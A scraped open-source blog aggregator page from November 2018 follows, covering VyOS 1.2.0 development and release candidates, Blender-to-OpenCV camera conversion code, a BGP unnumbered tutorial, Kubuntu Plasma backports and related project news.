After all this, I am reluctant to give a new timeline for shipping the dev kits… What we know is that our new PCB fabrication here in the USA will be 11 business days. We will make over 300 of these boards, which are pretty complex—we have over 160 different parts and more than 500 components in total per board. This takes some time, even with the amazing SMT machines placing tiny parts (such as 0201 SMD types). I wouldn’t be able to place these by hand!

From testing the prototypes, it will probably take another week (probably two) until we can give the green light for PCB fabrication to begin, then about two weeks for them to be fabricated, and another week for production, assembly, testing and shipping. As you can see, with all that, we will likely roll into December. With that said however, we are doing our very best to ship out all boards in the early part of December, so that all backers should get their new toys well before the end of the year (given the shipping carriers don’t cause delays).

Thank you for all the active community development and tremendous support! See our video below on how these boards are being put together. Oh and by the way, we have a little survey for you, check out our enterprise page if you’d like to help!

09 November, 2018 12:18AM by Nicole Faerber

November 08, 2018

hackergotchi for Maemo developers

Maemo developers

From Blender to OpenCV Camera and back

In case you want to employ Blender for Computer Vision like e.g. for generating synthetic data, you will need to map the parameters of a calibrated camera to Blender as well as mapping the blender camera parameters to the ones of a calibrated camera.

Calibrated cameras typically base around the pinhole camera model which at its core is the camera matrix and the image size in pixels:

K = \begin{bmatrix}f_x & 0 & c_x \\ 0 & f_y& c_y \\ 0 & 0 & 1 \end{bmatrix}, (w, h)

But if we look at the Blender Camera, we find lots non-standard and duplicate parameters with random or without any units, like

  • unitless shift_x
  • duplicate angle, angle_x, angle_y, lens

Doing some research on their meaning and fixing various bugs in the proposed conversion formula, I could however come up with the following python code to do the conversion from blender to OpenCV

# get the relevant data
cam =["cameraName"].data
scene = bpy.context.scene
# assume image is not scaled
assert scene.render.resolution_percentage == 100
# assume angles describe the horizontal field of view
assert cam.sensor_fit != 'VERTICAL'

f_in_mm = cam.lens
sensor_width_in_mm = cam.sensor_width

w = scene.render.resolution_x
h = scene.render.resolution_y

pixel_aspect = scene.render.pixel_aspect_y / scene.render.pixel_aspect_x

f_x = f_in_mm / sensor_width_in_mm * w
f_y = f_x * pixel_aspect

# yes, shift_x is inverted. WTF blender?
c_x = w * (0.5 - cam.shift_x)
c_y = h * (0.5 + cam.shift_y)

K = [[f_x, 0, c_x],
     [0, f_y, c_y],
     [0,   0,   1]]

So to summarize the above code

  • Note that f_x/ f_y encodes the pixel aspect ratio and not the image aspect ratio w/ h.
  • Blender enforces identical sensor and image aspect ratio. Therefore we do not have to consider it explicitly. Non square pixels are instead handled via pixel_aspect_x/ pixel_aspect_y.
  • We left out the skew factor s (non rectangular pixels) because neither OpenCV nor Blender support it.
  • Blender allows us to scale the output, resulting in a different resolution, but this can be easily handled post-projection. So we explicitly do not handle that.
  • Blender has the peculiarity of converting the focal length to either horizontal or vertical field of view (sensor_fit). Going the vertical branch is left as an exercise to the reader.

The reverse transform can now be derived trivially as

cam.shift_x = -(c_x / w - 0.5)
cam.shift_y = c_y / h - 0.5

cam.lens = f_x / w * sensor_width_in_mm

pixel_aspect = f_y / f_x
scene.render.pixel_aspect_x = 1.0
scene.render.pixel_aspect_y = pixel_aspect
0 Add to favourites0 Bury

08 November, 2018 05:12PM by Pavel Rojtberg (

Cumulus Linux

Cumulus content roundup: October

.We’re back with the Cumulus content roundup- October edition. We’ve kept busy this month with a new white boarding video series, podcasts, resources and more. Covering everything from Open Source to digital transformation, we’ve rounded it all up right here, so settle in and stay a while!

From Cumulus Networks:

Preparing your network for digital transformation: Learn about the primary challenges with digital transformation and how web-scale networking principles make digital transformation possible and profitable. Is your network ready for the future?

Web-scale networking for cloud service providers: Find out why cloud service providers need to have agile, highly scalable and cost effective infrastructure in order to stand out to their customers.

Our dedicated approach to open source networking: Read our philosophy and how we’ve contributed to and participated in the open source community.

Web-scale Whiteboarding: Openstack Overview: Watch our brand new series of whiteboarding videos with our very own Pete Lumbis

Kernel of Truth: Episode 9: Tune into this podcast episode as we dive into Layer 3 networking and why we believe it’s the future of network design.

News from the web:

Gartner Peer Insights: See the full list of companies recognized for Best Data Networking of 2018, including Cumulus Networks!

Fortune Best 2018: Cumulus Networks won Best 100 Medium Size Company to work for. Read all about it here.

Open Stack Summit Berlin 2018: Cumulus Networks is a returning sponsor at OpenStack Summit in Berlin! Stop by booth C18 to learn how you can maximize your OpenStack cloud with Cumulus Linux. You’ll also have the chance to win some awesome prizes!

To learn more about how our solution integrates with OpenStack, check out our theater session on day 1 of the event with iNNOVO Cloud: Tuesday, November 13th from 12:00 – 12:20 PM.



The post Cumulus content roundup: October appeared first on Cumulus Networks engineering blog.

08 November, 2018 03:16PM by Alexandra Jorde

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Podcast from the UK LoCo: S11E35 – Stranger on Route Thirty-Five

This week we’ve been using windows Subsystem for Linux and playing with a ThinkPad P1. IBM buys RedHat, System76 announces their Thelio desktop computers, SSD encryption is busted, Fedora turns 15, IRC turns 30 and we round up the community news.

It’s Season 11 Episode 35 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

08 November, 2018 03:00PM


Restart Verwaltung – Impulse des Open Government Tag 2018

Die Welt um uns herum ist geprägt vom digitalen Wandel. Die stetige Weiterentwicklung der Technik ist dabei nur ein Aspekt. Viel bedeutender ist der gesellschaftliche Wandel, der sowohl Bürgerschaft, Politik, Wirtschaft, als auch uns als … Weiterlesen

Der Beitrag Restart Verwaltung – Impulse des Open Government Tag 2018 erschien zuerst auf Münchner IT-Blog.

08 November, 2018 10:19AM by Lisa Zech

November 07, 2018

hackergotchi for ZEVENET


Black Friday Campaign has been launched

Black Friday is great for online shopping and could be a nightmare for retailers, logistics and payment gateways sysadmins, devops and site reliability engineers due to the increase of usual peak traffic to their oneline stores. Zevenet is ready to increase the business continuity and accelerate it. Discover how through our new campaign dedicated to Black Friday.


07 November, 2018 02:36PM by Zevenet

hackergotchi for Ubuntu developers

Ubuntu developers

Kubuntu General News: Plasma 5.14.3 update for Cosmic backports PPA

We are pleased to announce that the 3rd bugfix release of Plasma 5.14, 5.14.3, is now available in our backports PPA for Cosmic 18.10.

The full changelog for 5.14.3 can be found here.

Already released in the PPA is an update to KDE Frameworks 5.51.

To upgrade:

Add the following repository to your software sources list:


or if it is already added, the updates should become available via your preferred update method.

The PPA can be added manually in the Konsole terminal with the command:

sudo add-apt-repository ppa:kubuntu-ppa/backports

and packages then updated with

sudo apt update
sudo apt full-upgrade



Please note that more bugfix releases are scheduled by KDE for Plasma 5.14, so while we feel these backports will be beneficial to enthusiastic adopters, users wanting to use a Plasma release with more stabilisation/bugfixes ‘baked in’ may find it advisable to stay with Plasma 5.13.5 as included in the original 18.10 Cosmic release.

Should any issues occur, please provide feedback on our mailing list [1], IRC [2], and/or file a bug against our PPA packages [3].

1. Kubuntu-devel mailing list:
2. Kubuntu IRC channels: #kubuntu & #kubuntu-devel on
3. Kubuntu ppa bugs:

07 November, 2018 12:44PM

hackergotchi for VyOS


VyOS 1.2.0 development news in July

Despite the slow news season and the RAID incident that luckily slowed us down only for a couple of days, I think we've made good progress in July.

First, Kim Hagen got cloud-init to work, even though it didn't make it to the mainline image, and WAAgent required for Azure is not working yet. Some more work, and VyOS will get a much wider cloud platform support. He's also working on Wireguard integration and it's expected to be merged into current soon.

The new VRRP CLI and IPv6 support is another big change, but it's got its own blog post, so I won't stop there and cover things that did not get their own blog posts instead.

IPsec and VTI

While I regard VTI as the most leaky abstraction ever created and always suggest using honest GRE/IPsec instead, I know many people don't really have any choice because their partners or service providers are using it. In older StrongSWAN versions it used to just work.

Updating StrongSWAN to the latest version had an unforeseen and very unpleasant side effect: VTI tunnels stopped working. A workaround in form of "install_routes = no" in /etc/strongswan.d/charon.conf was discovered, but it has an equally bad side effect: site to site tunnels stop working when it's applied.

The root cause of the problem is that for VTI tunnels to work, their traffic selectors have to be set to for traffic to match the tunnel, even though actual routing decision is made according to netfilter marks. Unless route insertion is disabled entirely, StrongSWAN thus mistakenly inserts a default route through the VTI peer address, which makes all traffic routed to nowhere.

This is a hard problem without a workaround that is easy and effective. It's an architectural problem in the new StrongSWAN, according to our investigation of its source code and its developer responses, there is simply no way to control route insertion per peer. One developer responded to it with "why, site to site and VTI tunnels are never used on the same machine anyway" — yeah, people are reporting bugs just out of curiosity.

While there is no clean solution within StrongSWAN, this definitely has been a blocker for the release candidate. Reimplementing route insertion with an up/down script proved to be a hard problem since there are lots of cases to handle and complete information about the intended SA may not always be available to scripts. Switching to another IKE implementation seems like an attractive option, but needs a serious evaluation of the alternatives, and a complete rewrite of the IPsec config scripts — which is planned, but will take a while because the legacy scripts is an unmaintainable mess.

I think I've found a workable (even if far from perfect workaround) — instead of inserting missing routes, delete the bad routes. I've made a test setup and it seems to work reasonably well. The obvious issue is that it doesn't prevent bad things from happening, but rather undoes the damage, so there may still be a brief traffic disruption when VTI tunnels go up. Another problem is a possible race condition between StrongSWAN inserting routes and the script deleting them, though I haven't seen it in practice yet and I hope it doesn't exist. But, at least you can now use both VTI and site to site tunnels on the same machine.

For people who want to use VTI exclusively, there is now "set vpn ipsec options disable-route-autoinstall" option that disables route insertion globally, thus removing the possible disruption, at cost of making site to site tunnels impossible to use. That option is disabled by default.

I hope it will be good enough until we find a better solution. Your testing is needed to confirm that it is!

07 November, 2018 07:15AM by Daniil Baturin

VyOS development news in August and September

Most importantly: all but one blockers for the 1.2.0 release candidate are now resolved. Quite obviously, for the release candidate, we want all features that worked in 1.1.8 to work fully.

New release naming scheme

While we are at it, I'd like to announce a small cosmetic change. Until now, our release branches were named after chemical elements. This naming scheme is getting a bit too common though (OpenDayLight is a well known example, but there are more), we decided to change it to something else to avoid confusion and be a bit more original.

The new branch theme is constellations sorted by area (in square degrees), from the smallest to the largest. The 1.2.0 release will be named Crux. Crux, also known as the Southern Cross, is a small but bright and iconic constellation that is depicted on flags of many countries of the southern hemisphere, such as Australia and New Zealand.

The 1.3.0 release will be named Equuleus, which is the latin for little horse (no relation to My Little Pony).

Migration to FRR from Quagga

We have resolved most of the migration problems and latest nightly builds already use FRR instead of our aged Quagga.

It will open a path to implementing many new protocols and features, such as BFD, PIM-SM, and more. What kept us from migrating was lack of support for multiple routing tables, which we need for PBR. FRR added it recently, and by now the last known issue that blocked migration (routes from the default table unintentionally leaking into non-default tables) has been resolved, so we finally can migrate without losing any features.

While I do feel somewhat uneasy about licensing of certain daemons, that are included in the source tree but use a permissive open source license even though they are linked against GPL libraries, we do not believe there's a GPL violation in it as long as the license of the binary package is GPL. Not sharing a modified source code of those daemons with users of the binary package would be a GPL violation, but we keep all source code of every VyOS component public.

New BGP address-family syntax

This is still in the works, but it will make it to the nightly builds soon.

Originally, VyOS used to have IPv6-specific BGP options under "address-family ipv6-unicast", but IPv4 options were directly under neighbor. The historical reason is that originally IPv6 BGP was not supported at all. This syntax was rather inconsistent, and made it hard to quickly see which options are address family specific. We used to stick with that inconsistent syntax just because it was always done that way.

One behaviour change in FRR made us reconsider that. As you may know, in BGP, routing information exchange is completely orthogonal to the session transport: IPv4 routes can be exchanged over a TCP connection established between IPv4 addresses and vice versa. The default behaviour of most, if not all, BGP implementation is to enable both address families regardless of the session transport.

That behaviour can be changed by an option, in VyOS, that's "set protocols bgp ... parameters default no-ipv4-unicast". The old behaviour of Quagga was to apply that only to sessions whose transport is IPv6, which is just as inconsistent. FRR takes that option literally and disabled IPv4 route advertisments for all peers if it's active, unless peers are explicitly activated for the IPv4 address family.

Making VyOS play well with that development requires an option to do that, and "address-family ipv4-unicast" is an obvious candidate, but introducing a special case doesn't feel write. I think moving original options to that subtree is a cleaner solution. Yes, it does require reprogramming your fingers, but when we start adding support for more address families, the original syntax will only start looking even more like an atavism.

This is what the new syntax will look like:
dmbaturin@vyos# show protocols bgp 
 bgp 64444 {
     address-family {
         ipv4-unicast {
             network {
     neighbor {
         address-family {
             ipv4-unicast {
                 allowas-in {
                     number 3
                 default-originate {
                     route-map Foo
                 maximum-prefix 50
                 route-map {
                     export Bar
                     import Baz
                 weight 10
         ebgp-multihop 255
         remote-as 64793

Node renaming in migration scripts

Renaming nodes is a very common task in config syntax migration, but until now it could only be done very indirectly. The old XorpConfigParser simply could not separate names from values and renaming nodes was usually done by regex replace. In the new vyos.configtree you'd need to delete the old node and recreate it from scratch.

Until now. Lately we introduced a function that does it one step. If you, for whatever reason, wanted to rename "service ssh" subtree to "service secure-shell", you could do it like this:

with open("/config/config.boot") as f:
    config_text =
config = vyos.configtree.ConfigTree(config.text)

config.rename(["service", "ssh"], "secure-shell")


One of the reason for introducing it is to make it easier to clean up the DHCP server syntax.

DHCP server rewrite

While we are waiting for the FRR fixes, we (Christian Poessinger and I mainly) decided to eliminate one more bit of the legacy code and give DHCP server scripts a rewrite. We also decided to clean up its syntax.

One of the things that always annoyed me was nested nodes for address ranges: "subnet start stop". Now start and stop will be different nodes, so that they are easy to change independently: "subnet range Foo start; ... stop".

We will also rename the unwieldy "shared-network-name" to "pool". Operational mode commands always used the "pool" terminology, so it will also improve command consistency.

Wireguard support

Thanks to our contributor who goes by hagbard, VyOS now supports wireguard. The work on it is nearly complete, and will be covered in a separate post.

TFTP server support

Thanks to Christian Poessinger, VyOS now has TFTP server. It was a frequently requested feature, and I think it makes sense for people who keep DHCP on the router and do not want to setup another machine for provisioning phones, think clients and so on.

This is an example of TFTP server with all options set:

service {
 tftp-server {
     directory /config/tftp
     port 69

DMVPN works again

Thanks to our contributor Runar Borge, we have identified the cause and fixed the issues that broke DMVPN after upgrading to the latest upstream StrongSWAN. It should now work as expected.

L2TP/IPsec works again

One of the blockers introduced by upgrade to StrongSWAN 5.6 was broken L2TP/IPsec. We've adjusted the config to use the new syntax and now it works again.

More to come

We are actively working on getting the codebase ready for the release candidate. Stay tuned for new updates!

07 November, 2018 07:15AM by Daniil Baturin

First VyOS 1.2.0 release candidate is available for download

This month, the VyOS project turns five years old. In these five years, VyOS has been through highs and lows, up to speculation that the project is dead. Past year has been full of good focused work by the core team and community contributors, but the only way to make use of that work was to use nightly builds, and nightly builds are like a chocolate box a box of WWI era shells—you never know if it blows up when handled or not. Now the codebase has stabilized, and we are ready to present a release candidate. While it has some rough edges, a number of people, including us, are already using recent builds of VyOS 1.2.0 in production, and now it's time to make it public.

VyOS 1.2.0-rc1 is available for download from

VyOS 1.2.0 (Crux) is the feature expansion release based on Debian Jessie. The release candidate will be the basis for the future long term support release. You can read the full release notes at

New features include:

  • Wireguard support
  • PPPoE server
  • mDNS repeater and broadcast relay
  • Support for IPv6 VRRP and unicast VRRP operation
  • NPTv6
  • Standards-compliant QinQ ethertype option
  • Python APIs for accessing the running config and writing migration scripts (replacements of the Perl Vyatta::Config and XorpConfigParser)
  • New XML-based command definitions
  • New build system that makes it easy to create custom builds with additional repositories and packages
  • SR-IOV support for Intel and Mellanox cards

The following features have been removed:

  • Telnet server
  • p2p filtering

While the base system if Debian Jessie, multiple packages have been updated to much newer versions, for example, the 4.14.65 kernel, StrongSWAN 5.6, and keepalived 2.0.5.

Additionally, our old Quagga has been replaced with FRR, which opens a way to adding support for many more protocols, including multicast routing.

Known issues

Some people reported issues with DMVPN in hub mode (T848).

Some people report an issue with routers responding to all ARP requests when VTI is enabled (T852).

If you use DMVPN or VTI, you may either help with testing and debugging those issues, or wait until the issues are confirmed to be resolved.

What's next

VyOS 1.2.0 will become the LTS release after one or more release candidates.

We are preparing a release model change that will involve splitting VyOS into an LTS branch a (roughly) monthly rolling release made from the latest code from the current branch. Both branches will be entirely open source, but while the rolling release builds will be available free of charge to everyone, the LTS ISO image builds will be only available to those who either contribute to VyOS (code, documentation, and community activities all count) or purchase a subscription. There will always be an option to build the LTS image entirely from source or using package repositories at, though commercial support will only be provided for official builds, or by special arrangement.

We are also working on new commercial support plans and pricing models.

The current branch will now be used for developing 1.3.0. Top priorities for 1.3.0 include migration to the next Debian release and rewriting more legacy code to enable better testing and easier addition of new features.

In a sense, VyOS 1.2.0 was a test whether the project can exist independently or not. While 1.1.x was an incremental expansion of the last Vyatta Core release, development of 1.2.0 coincided with mainstream Linux distributions switching to systemd, many packages such as StrongSWAN making big incompatible changes, and parts of VyOS itself reaching the point when bugs could no longer be fixed without a complete rewrite. The build system also had to be rewritten from scratch.

A lot of work went into developing the new infrastructure for Python rewrites, including the new system of command definitions and required libraries. By now a a few components including SSH, SNMP, cron, and DNS forwarding have been rewritten in the new way, and the rewrite movement is gaining momentum.

Let's test and polish the 1.2.0 release, and keep working on making VyOS a better, more easily maintainable platform in the future 1.3.0 release.

07 November, 2018 07:01AM by Daniil Baturin

VyOS 1.2.0-rc2 is available for download, with fixes to wireguard and PBR

The second release candiate is available for download from 

We are happy to see so many people test the release candidates! Some bugs were already found and fixed, and we are working on some more bugs found since the release of 1.2.0-rc1. To make already completed fixed available, we are making the second release candidate.

Resolved issues

  • Wireguard module not loading (T881).
  • PBR routes leaking into other tables (T882).
  • Unhandled exception in the wireguard op mode (T883).

Known issues

  • Fail to add an OpenVPN to a bridge group if cost is not specified (T884, let us know if you also see it).
  • commit-confirm doesn't cancel reboot properly (T870).
  • The GPG key for release builds is not included in the image

Stay tuned for the rc3!

07 November, 2018 07:01AM by Daniil Baturin

VyOS 1.2.0-rc3 is available for download, with BGP large communities and new bugfixes

VyOS 1.2.0-rc3 release candidate is available for download from

Thanks to all people testing release candidates, more bugs were uncovered and fixed. But this release also includes a new feature, that was made possible by migration away from our outdated Quagga, namely:

BGP large communities

Since we are using FRR rather than an outdated Quagga version now, we could finally add CLI support for a long requested feature: large communities. Now that RIRs are out of 32-bit AS numbers, it's more relevant than ever.

The syntax is very simple and similar to that of community-lists:
set policy large-community-list Foo rule 10 action permit
set policy large-community-list Foo rule 10 regex 4000000:33333:4444
set policy large-community-list Foo rule 20 action deny
set policy large-community-list Foo rule 20 regex '^$'

set policy route-map Bar rule 10 action permit
set policy route-map Bar rule 10 match large-community large-community-list Foo

set policy route-map Quux rule 10 action permit
set policy route-map Quux rule 10 set large-community 90000:555:111

Note that there are no well-known communities such as "no-export" here, unlike in the classic communities. I also decided not to implement support for "standard" (numbered) large-community-lists and only include "expanded" (named) lists.

Now to the bug fixes.

Directly connected interface-routes

Some hosting providers, for example,, use an unusual configuration with /32 host addresses, where you are supposed to create an interface-based route to the default gateway address and then create a default route via that address.

While this configuration is against the classic networking common sense, and I'm not a fan of it, it's technically perfectly valid and increasingly common. The Linux kernel network stack uses a "you asked for it, you get it" approach and allows you to do any crazy things, which sometimes turn out surprisingly useful. Our old Quagga, however, would treat such routes as unreachable because the next hop address is not from the same network as assigned on the interface — sound reasoning, but in this situation it was wrong.

The only way to make it work was to add an iproute2 command to the postconfig script, which is cumbesome. Migration to FRR seems to have resolved that issue though. This configuration appears to work fine in my lab:

set interfaces ethernet eth1 address
set protocols static interface-route next-hop-interface eth1
set protocols static route next-hop

This is what the route table looks like: the route is treated as directly connected.

vyos@vyos# run show ip route
S> [1/0] via (recursive), 00:00:03
  *                   via, eth1 onlink, 00:00:03
C>* is directly connected, eth1, 00:00:03
S>* [1/0] is directly connected, eth1, 00:00:03

And this is what it looks like in the kernel:

vyos@vyos# run show ip route forward 
default via dev eth1 proto static metric 20 onlink dev eth0 proto kernel scope link src dev eth1 proto static metric 20 

If you are using or another hosting provider that uses this scheme, please test it and tell us if it works for you without workarounds.

Fixes in bridging and tunnels

Thanks to Kroy from the forum, we tracked down and fixed a few bridging bugs that had been there for a long time but no one noticed.

The first bug was that the system allowed you to remove a bridge that still has active members (T898). Even with that bug fixed, you still could not remove a tunnel interface from a bridge because its own script was faulty (T900).

Both are now fixed, but there are still issues in that script: STP cost and priority options are not functional. We may fix it in the next release candidate.

Additionally, OpenVPN interfaces could not be added to bridges due to a brctl syntax change, as reported by afics in T884. This should also be fixed now.

Image signature check failure confirmation

Armin Fisslthaler (afics) noticed a particularly embarassing bug: when the installer fails to verify image GPG signature (due to missing key or otherwise), it asks if you want to proceed, and suggests that the default option is "No", but if you just hit Enter, it proceeds instead of exiting (T885).
Ewald van Geffen took the time to fix that conditional and now it should no longer haunt us.

Missing release key in the image

Speaking of which, the VyOS release key is now included in the image and signature check should no longer fail.

More fixes

Corrected the syntax for deleting IPv6 next-hop (T800, fix suggested by Merjin).

IPv6 next-hop local value is now validated at set rather than commit time (T897).

Known issues

07 November, 2018 07:00AM by Daniil Baturin

VyOS 1.2.0-rc4 is available for download

VyOS 1.2.0-rc4 release candidate is available for download from here

The release includes multiple bug fixes and a few small features.

You can view the complete changelog here.

Here are some highlights:

Bugfix: SNMP and routing protocols

Due to a change in FRR compared to our old Quagga, SNMP support for routing protocols had been broken for a while. Now it should work again.

Bugfix: BGP community lists

Due to another change in FRR, we've had an annoying bug that made it impossible to edit  BGP community list rules after creation (T799).

For now it was fixed using a dirty hack that may slow down community list editing operations somewhat, and the root cause was reported to FRR maintainers. Once they fix it, we can remove the hack easily.

Feature: BGP extended community lists

Support for extended community lists was supposed to be there for a long time, but in reality the commands were broken (T64).
The bug in community lists editing helped us discover that issue, and the commands were fixed.

Here is an example of that feature's syntax:

# show policy extcommunity-list ExctcommunityExample 
 rule 10 {
     action permit
     regex 100000:999
 rule 30 {
     action deny
     regex ^$
# show policy route-map ExtcommunityExample 
 rule 10 {
     action permit
     match {
         extcommunity ExctcommunityExample

Please test is and tell us if it works fine for you.

SSH allow-root option

The "service ssh allow-root" is no longer supported. It will be automatically removed from configs first time the upgrade image boots.

It's a common wisdom that logging in as root is not a good idea. We believe this change is going to have a very limited impact at best.  One objection was that automation tools may need it, but all modern tools such as ansible are capable of elevating privileges properly with sudo.

However, if your automation setup is using it, please take it into account. You still have time to do it before 1.2.0 LTS is released.

New drivers and utilities

VyOS now includes updated firmware packages, in particular, new firmware for Broadcom cards that were reported not to work in T708.

The image also includes a few popular diagnostic tools by default, such as htop, atop, and iotop.

07 November, 2018 07:00AM by Daniil Baturin

VyOS 1.2.0-rc5 is available for download

As the tradition dictates, the new weekly release candidate is available for download 

Package updates

The following packages have been updated:

  1. Linux kernel to 4.14.75
  2. Mellanox network drivers to 4.4

Bug fixes

SNMP integration with routing protocols

The last bit configuration that is required for it to work is in now, and it should work as expected again. If it doesn't work for you, let us know!

VRRP not working in unicast mode when the RFC-compatible mode is selected

In T933 it was reported that if you configure VRRP in unicast mode and choose to use virtual MACs (RFC compatible mode), both nodes become masters. Now the config option required for this to work is inserted into keepalived config.

DHCP relay now handles the port option correctly

As reported in T938, DHCP relay would not handle the port option correctly. Now it does.

Tag nodes with whitespace

As reported in T253, it was possible to create a tag node with whitespace in its name (e.g. "set system login user "foo bar" authentication..."), but such configs would not be parsed correctly if you try to load them back.

In most cases attempts to create such nodes should be blocked at the syntax validation level, but since old configs with such nodes may exist, and it is impossible to disallow doing that completely at the set command level, we've added support for quoting such nodes properly in the code responsible for displaying and saving configs. Now such configs will load at least partially and produce more descriptive errors when disallowed by individual command syntax.

Commit archive problem with edit levels

As reported in T570, changing the edit level caused the commit archive feature to save only the config at that level to the remote server, for example, if you did "edit interfaces", the archived config would contain nothing but the interfaces subtree.
It was caused by erroneous omission of the option that makes cli-shell-api output the entire config regardless of the edit level and should be fixed now.

The "run monitor traffic interface ... filter" commands now has full support for tcpdump filters

As reported in T931, commands like "run monitor traffic interface eth0 filter ''src or dst" would fail. Now the simple mistake that caused it is fixed and such commands should work again.

Compatibility notes

Username restrictions

Related to the whitespace issue, some commands had overly permissive syntax. The "system login user" username format has been restricted to the POSIX portable characters and length below 100 now (that's alphanumeric characters, underscores, hyphens, and dots). If usernames do not conform to the undeniably portable format (alphanumeric and underscores/hyphens only), you will receive a warning.

There may be old configs with unusual usernames, and they now may fail to load. If you run into issues with that restrictions, let us know.

The "inspect" action in firewall rules no longer exists

The "inspect" action was once used for the IPS/IDS functionality, but the IDS (it was Snort) was removed long before VyOS was forked from Vyatta. The now useless action, however, persisted.

Now we have removed it. We think the chance to see it in a real config is very low, and this should have no impact, but if you run into problems, leave a note in T59, and we'll make a migration script.

In other news

The 1.2.0/Crux repositories are now fully separated from the "current" branch repositories, in preparation for the LTS release. This reopens the "current" branch for experimental and potentially unsafe changes so that we can start working on new big rewrites, migration to newer Debian and other things required for the future 1.3.0 release.

07 November, 2018 07:00AM by Daniil Baturin

hackergotchi for Ubuntu developers

Ubuntu developers

Diego Turcios: Access to AWS Postgres instance in private subnet

I have been working with AWS in the last days and encounter some issues when using RDS.  Generally when you're working in development environment you have setup your database as Publicly accessible and this isn't an issue. But when you're working in Production. So we place the Amazon RDS database into a private subnet. What we need to do for connecting to the database using PgAdmin or other tool?

We're going to use one of the most common methods for doing this. You will need to launch an Amazon EC2 instance in the public subnet and then use it as jumping box.

So after you have your EC2, you will need to run the following command.
See explantion below

After this, you will need to configure your PgAdmin.
The host name will be your localhost, the port is the same you define in the above command.
Maintenance database will be your DB name and the username you have for connecting.

Hope this helps you connect to your databases.

07 November, 2018 02:54AM by Diego Turcios (

November 06, 2018

Cumulus Linux

BGP Unnumbered Overview

The Border Gateway Protocol (BGP) is an IP reachability protocol that you can use to exchange IP prefixes. Traditionally, one of the nuisances of configuring BGP is that if you want to exchange IPv4 prefixes you have to configure an IPv4 address for each BGP peer. In a large network, this can consume a lot of your address space, requiring a separate IP address for each peer-facing interface.

BGP Over IPv4 Interfaces

To understand where BGP unnumbered fits in, it helps to understand how BGP has historically worked over IPv4. Peers connect via IPv4 over TCP port 179. Once they’ve established a session, they exchange prefixes. When a BGP peer advertises an IPv4 prefix, it must include an IPv4 next hop address, which is usually the address of the advertising router. This requires, of course, that each BGP peer has an IPv4 address.

As a simple example, using the Cumulus Reference Topology, let’s configure BGP peerings as follows:

Between spine01 (AS 65020, and leaf01 (AS 65011,

Between spine01 ( and leaf02 (AS 65012,

Leaf01 will advertise the prefix and leaf02 will advertise the prefix Let’s set it up:

Now let’s take a look at the BGP RIB to see if spine01 has learned the and prefixes:

It has! And notice that the Next Hop address for each is the interface IPv4 address of the respective neighbor. The requirement that each prefix has a Next Hop address is the reason we historically had to configure IPv4 addresses on all of our BGP-speaking interfaces.

Enabling BGP Unnumbered

The BGP unnumbered standard, laid out in RFC 5549, no longer requires an IPv4 prefix to be advertised along with an IPv4 next hop. That means you can set up BGP peering among your Cumulus Linux switches and exchange IPv4 prefixes without having to configure an IPv4 address on each switch. In other words, the interfaces used by BGP are unnumbered, at least when it comes to IPv4. So next, let’s remove those interface IPv4 addresses and set up BGP unnumbered.

The BGP session with leaf01 and leaf02 will immediately drop and spine01 will remove the two prefixes it learned. Let’s verify this:

Next, we’ll reconfigure BGP to use the IPv6 link-local addresses of leaf01 and leaf02, instead of their IPv4 addresses.

There’s a new command we need to issue for each interface: the capability extended-nexthop command is what actually enables BGP Unnumbered:

We’ll do the same thing on leaf01:

And leaf02:

Now let’s jump back to spine01 and see if we have a BGP session established with leaf01 and leaf02.

Notice that the Next Hop for each prefix is no longer an address, but an interface – swp1 and swp2. Let’s take a closer look at the RIB to see what these interfaces resolve to.

The next hop address for each prefix is an IPv6 link-local address, which is assigned automatically to each interface. By using the IPv6 link-local address as a next hop instead of an IPv4 unicast address, BGP Unnumbered saves you from having to configure IPv4 addresses on each interface!

Finally, the ultimate test is whether leaf01 and leaf02 have IP reachability to each other. Let’s run a traceroute from leaf01 to leaf02.

The packets move from leaf01 through spine01 and finally to leaf02. Even though spine01 has no interface IPv4 addresses configured, and even though each BGP session is running over IPv6, they’re all still able to exchange IPv4 routes and pass IPv4 traffic.

And that’s BGP Unnumbered.

Looking for more technical resources? Read all of our latest blogs here. 

The post BGP Unnumbered Overview appeared first on Cumulus Networks engineering blog.

06 November, 2018 08:10PM by Ben Piper

hackergotchi for Ubuntu developers

Ubuntu developers

Jono Bacon: Video: 10 Avoidable Career Mistakes (and How to Conquer Them)

I don’t claim to be a career expert, but I have noticed some important career mistakes many people make (some I’ve made myself!). These mistakes span how we approach our career growth, balance our careers with the rest of our lives, and the make the choices we do on a day to day basis.

In the latest episode of my Open Organization video series, I delve into 10 of the most important career mistakes people tend to make. Check it below:

So, now let me turn it to you. What are other career mistakes that are avoidable? What have you learned in your career? Share them in the comments below!

The post Video: 10 Avoidable Career Mistakes (and How to Conquer Them) appeared first on Jono Bacon.

06 November, 2018 04:30PM

hackergotchi for Qubes


XSA-282 does not affect the security of Qubes OS

Dear Qubes Community,

The Xen Project has published Xen Security Advisory 282 (XSA-282). This XSA does not affect the security of Qubes OS, and no user action is necessary.

This XSA has been added to the XSA Tracker:

06 November, 2018 12:00AM

November 05, 2018

hackergotchi for Ubuntu developers

Ubuntu developers

The Fridge: Ubuntu Weekly Newsletter Issue 552

Welcome to the Ubuntu Weekly Newsletter, Issue 552 for the week of October 28 – November 3, 2018. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

05 November, 2018 10:56PM

hackergotchi for ARMBIAN


Bananapi R2

Hold power button for about 7-8 seconds to power the device up. Boot log: Known problems: HDMI is not working and will probably never, onboard wireless is too fragile, disabled by default.

05 November, 2018 10:34AM by chwe

hackergotchi for Ubuntu developers

Ubuntu developers

Jono Bacon: My Clients Are Hiring Community Roles: Corelight, Scality, and Solace

One of the things I love about working with such a diverse range of clients is helping them to shape, source, and mentor high-quality staff to build and grow their communities.

